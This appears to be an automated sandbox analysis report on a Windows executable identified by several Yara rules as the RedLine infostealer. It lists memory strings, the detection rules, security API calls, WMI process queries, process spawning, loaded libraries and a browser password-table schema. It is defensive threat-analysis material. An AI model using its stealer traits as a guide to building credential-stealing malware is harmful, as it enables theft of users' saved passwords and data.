                  Source: PalEak0Yh6.exe, 00000004.00000002.1367759997.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, tmpDC4F.tmp.4.dr, tmpA510.tmp.4.dr, tmp6D31.tmp.4.dr, tmp6D00.tmp.4.dr, tmpA4EF.tmp.4.dr, tmpA521.tmp.4.dr, tmpA4DE.tmp.4.dr, tmpA520.tmp.4.dr, tmpA4FF.tmp.4.dr, tmpA4CD.tmp.4.dr, tmpA4CC.tmp.4.dr, tmp6D11.tmp.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: tmp6D11.tmp.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: tmp6D11.tmp.4.drString found in binary or memory: https://gemini.google.com/app?q=
                  Source: PalEak0Yh6.exe, PalEak0Yh6.exe, 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: PalEak0Yh6.exe, 00000004.00000002.1367759997.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, tmpDC4F.tmp.4.dr, tmpA510.tmp.4.dr, tmp6D31.tmp.4.dr, tmp6D00.tmp.4.dr, tmpA4EF.tmp.4.dr, tmpA521.tmp.4.dr, tmpA4DE.tmp.4.dr, tmpA520.tmp.4.dr, tmpA4FF.tmp.4.dr, tmpA4CD.tmp.4.dr, tmpA4CC.tmp.4.dr, tmp6D11.tmp.4.drString found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: PalEak0Yh6.exe, 00000004.00000002.1367759997.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, tmpDC4F.tmp.4.dr, tmpA510.tmp.4.dr, tmp6D31.tmp.4.dr, tmp6D00.tmp.4.dr, tmpA4EF.tmp.4.dr, tmpA521.tmp.4.dr, tmpA4DE.tmp.4.dr, tmpA520.tmp.4.dr, tmpA4FF.tmp.4.dr, tmpA4CD.tmp.4.dr, tmpA4CC.tmp.4.dr, tmp6D11.tmp.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.PalEak0Yh6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 4.2.PalEak0Yh6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 4.2.PalEak0Yh6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000000.00000002.1213688034.0000000003819000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000000.00000002.1213688034.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: PalEak0Yh6.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: PalEak0Yh6.exe PID: 7972, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_00BEDE940_2_00BEDE94
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_073487B80_2_073487B8
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_073487C80_2_073487C8
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_0734A6000_2_0734A600
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_073470780_2_07347078
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_073470880_2_07347088
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_07346C500_2_07346C50
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_07348CD80_2_07348CD8
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_07348CC70_2_07348CC7
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_073468180_2_07346818
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4_2_00E3E7B04_2_00E3E7B0
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4_2_00E3DC904_2_00E3DC90
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4_2_063296284_2_06329628
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4_2_063234604_2_06323460
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4_2_063244684_2_06324468
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4_2_063212104_2_06321210
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4_2_0632D1084_2_0632D108
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 4_2_0632DD004_2_0632DD00
                  Source: PalEak0Yh6.exe, 00000000.00000002.1210941987.0000000002855000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1210941987.0000000002862000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000000.00000000.1185679301.0000000000412000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSFXH.exe0 vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1216053561.0000000006940000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1213688034.0000000003819000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1217362580.0000000007440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1209507481.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1213688034.0000000003851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000000.00000002.1213688034.0000000003851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000004.00000002.1363295812.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exe, 00000004.00000002.1362396894.0000000000E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exeBinary or memory string: OriginalFilenameSFXH.exe0 vs PalEak0Yh6.exe
                  Source: PalEak0Yh6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.PalEak0Yh6.exe.3831398.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.PalEak0Yh6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 4.2.PalEak0Yh6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 4.2.PalEak0Yh6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.PalEak0Yh6.exe.38b5690.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000000.00000002.1213688034.0000000003819000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000000.00000002.1213688034.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: PalEak0Yh6.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: PalEak0Yh6.exe PID: 7972, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: PalEak0Yh6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, L5WHeG6W5PIdT4Sv3j.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, L5WHeG6W5PIdT4Sv3j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, L5WHeG6W5PIdT4Sv3j.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, L5WHeG6W5PIdT4Sv3j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, nEiyoL86ujpGOOnrmF.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, L5WHeG6W5PIdT4Sv3j.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, L5WHeG6W5PIdT4Sv3j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/43@1/2
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PalEak0Yh6.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeFile created: C:\Users\user\AppData\Local\Temp\tmp34B4.tmpJump to behavior
                  Source: PalEak0Yh6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PalEak0Yh6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: tmp6CBD.tmp.4.dr, tmp6CDE.tmp.4.dr, tmp6CEF.tmp.4.dr, tmp6CDF.tmp.4.dr, tmp6CCD.tmp.4.dr, tmp34B4.tmp.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: PalEak0Yh6.exeVirustotal: Detection: 45%
                  Source: PalEak0Yh6.exeReversingLabs: Detection: 63%
                  Source: unknownProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: dhcpcsvc6.dllJump to behavior
